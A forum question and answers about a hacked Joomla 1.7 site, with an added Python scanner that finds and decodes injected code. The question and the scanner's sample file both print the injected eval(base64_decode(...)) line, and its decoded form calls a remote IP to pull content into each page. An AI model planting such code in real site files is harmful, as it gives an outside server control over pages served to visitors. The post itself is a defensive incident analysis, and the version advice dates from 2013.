
I'm running a Joomla 1.7 site which was hacked today. The script below did the hack.

eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pIC4gJyZyZXE9JyAuIEB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJy8nIC4gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKTsNCg0K")));

The above line was injected into the index.php file of the templates folder. Every template that was in the folder had the above code. In each file it was repeated a few times.

When I decode the code, it outputs

print @file_get_contents('http://93.115.86.168/hlinks/links.php?ua=' . @urlencode($_SERVER['HTTP_USER_AGENT']) . '&req=' . @urlencode($_SERVER['HTTP_HOST'] . '/' . $_SERVER['REQUEST_URI'])); 

I removed the script and the site happens to work fine. The script didn't do anything bad, except that the site did not load at all.

My problem is: even when I have set the file permissions to 644 and the folder permissions to 755, how could this happen?

How can I figure out what caused the problem? What steps should I take to prevent this from happening in the future?

UPDATE

This Forum Post Assistant / FPA is very helpful

Techie
  • How can I figure out which one is it? – Techie Feb 20 '13 at 10:44
  • IMHO, being hacked by other user of your hosting service is the least likely cause. Vulnerabilities in your software or getting your PC infected by a virus are more common causes. – Álvaro González Feb 20 '13 at 10:46
  • @Dasun most Joomla sites are hacked via vulnerable third party extensions. Check what extensions you have installed, look each of them up to see if there are known vulnerabilities in the versions you have. – MrCode Feb 20 '13 at 19:14
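A defender-side way to answer "how do I find what was injected" across a whole templates folder, added here as an example and not code from the question or from any Joomla tool: it locates every eval(base64_decode(...)) line, decodes it (peeling nested layers if present) and reports the URL the payload would fetch. The sample index.php is constructed; the base64 blob inside it is the one quoted in the question.

```python
import base64
import re

# Matches eval(base64_decode("...")), including the doubled parentheses and either quote style.
EVAL_B64 = re.compile(
    r"""eval\s*\(+\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)+""")
URL_RE = re.compile(r"""https?://[^'"\s]+""")

# Constructed sample: the blob quoted in the question, planted twice in a harmless template file.
INJECTED_B64 = ("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgv"
                "aGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9V"
                "U0VSX0FHRU5UJ10pIC4gJyZyZXE9JyAuIEB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBf"
                "SE9TVCddIC4gJy8nIC4gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKTsNCg0K")
SAMPLE_INDEX_PHP = ("<?php\ndefined('_JEXEC') or die;\n"
                    f'eval((base64_decode("{INJECTED_B64}")));\n'
                    "echo '<html>';\n"
                    f'eval((base64_decode("{INJECTED_B64}")));\n')

def decode_payload(blob: str, max_depth: int = 5) -> str:
    """Base64-decode a blob, peeling nested eval(base64_decode()) layers."""
    text = blob
    for _ in range(max_depth):
        try:
            raw = base64.b64decode(re.sub(r"\s+", "", text), validate=True)
        except ValueError:
            break                       # not valid base64: report what we have
        text = raw.decode("utf-8", "replace")
        inner = EVAL_B64.search(text)
        if inner is None:
            break                       # reached the plain PHP payload
        text = inner.group(2)           # one more layer to unwrap
    return text

def scan_php_source(source: str) -> list[dict]:
    """One finding per eval(base64_decode(...)) occurrence in a PHP file's text."""
    findings = []
    for m in EVAL_B64.finditer(source):
        payload = decode_payload(m.group(2)).strip()
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "payload": payload,
            "urls": URL_RE.findall(payload),
            "fetches_remote": re.search(r"\b(file_get_contents|curl_exec|fopen)\s*\(", payload) is not None,
        })
    return findings

if __name__ == "__main__":
    for f in scan_php_source(SAMPLE_INDEX_PHP):
        print(f"line {f['line']}: fetches {f['urls']}\n  {f['payload'][:80]}")
```

Run it over each template's index.php (read the file and pass its text to scan_php_source) to list every injected line and the host it calls out to, which is the indicator to hand to the hosting provider and to search the rest of the install for.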

3 Answers


It is not reading a file from your file system, but rather reading directly from an external URL. You can disable reading from any external URL in PHP via the php.ini setting:

allow_url_fopen = 0
sg-
  • this will disable the twitter and facebook plugins too. I have a like button and a follow button. So this is not an option. – Techie Feb 20 '13 at 10:49
  • It won't disable those, as with Twitter and Facebook buttons the request to the external URL is made directly by the user themselves - not your server. This is how the Twitter and Facebook buttons know who is clicking them. – sg- Feb 20 '13 at 11:13
  • It will stop Joomla's One-Click-Update working though! – George Wilson Feb 20 '13 at 11:19

How about because you're running a Joomla 1.7 site? Joomla 1.7 is no longer supported and several security fixes have been added into Joomla since it was released. You should immediately upgrade to 2.5.9. There should be no backwards compatibility issues as 2.5.9 is just the Long Term Supported Release of Joomla 1.7.

Check your PHP settings are as advised in the Joomla Security Checklist here. Make sure your PHP and MySQL versions are reasonably up to date (at least PHP 5.3.x - preferably 5.4.x - and MySQL at least 5.0.4).

Finally, make sure all your extensions are up to date. Again, developers constantly update modules not just to add new features but also to add in extra/improved security or to protect against found vulnerabilities!

Also please note that turning on allow_url_fopen like Steven says will result in Joomla's One-Click-Update no longer working properly.

George Wilson
  • allow_url_fopen = 0 will disable the twitter and facebook plugins too. I have a like button and a follow button. So this is not an option. – Techie Feb 20 '13 at 11:01
  • Is there an upgrade path from 1.7 to 2.x? – Rimian Feb 20 '13 at 11:02
  • Yes there is. You just go into the Joomla Update Manager. There is a full docs page explanation here as well: http://docs.joomla.org/Upgrading_from_Joomla_1.7_to_Joomla_2.5 – George Wilson Feb 20 '13 at 11:07

It's not possible from what you've told us to pinpoint the cause of the hack, but the most likely reason (almost certain) is that you're running old versions of some software, which have known security holes that the hacker was able to attack.

  • Check your version of PHP: If it's anything lower than v5.3.21 or v5.4.11 (i.e. the current versions) you probably have security holes. If it's v5.2 or lower then it is definitely vulnerable (5.2 hasn't been supported for two years now). If your hosting provider is not up-to-date with their PHP version, then you need to hassle them to fix it. If they won't fix it, you need to find a better host.

  • Check your version of Joomla: is it up-to-date? You mention it's v1.7: this is not up to date; 1.7 was released a year and a half ago. Current versions are 2.5 and 3.0. That means you almost certainly have security holes in it, which means you can be hacked. Upgrading from 1.7 to 2.5 may be painful, but if you want to be secure, you must do it.

Keeping your software up to date is one of the most important things you can do on a website to keep it secure. It's not optional: If you want to avoid being hacked, you need to keep up to date, and you need to be keeping an eye on new releases constantly -- new security holes are found all the time. Generally most good quality software is fixed fairly quickly when a new bug comes to light, but it's your responsibility to install the fixed version on your server, otherwise the bug will still be there and will likely be hacked.

There are other ways you could have been hacked; let's not discount them; most of them are outside your control. Keeping your software versions updated is your number one best defense.

SDC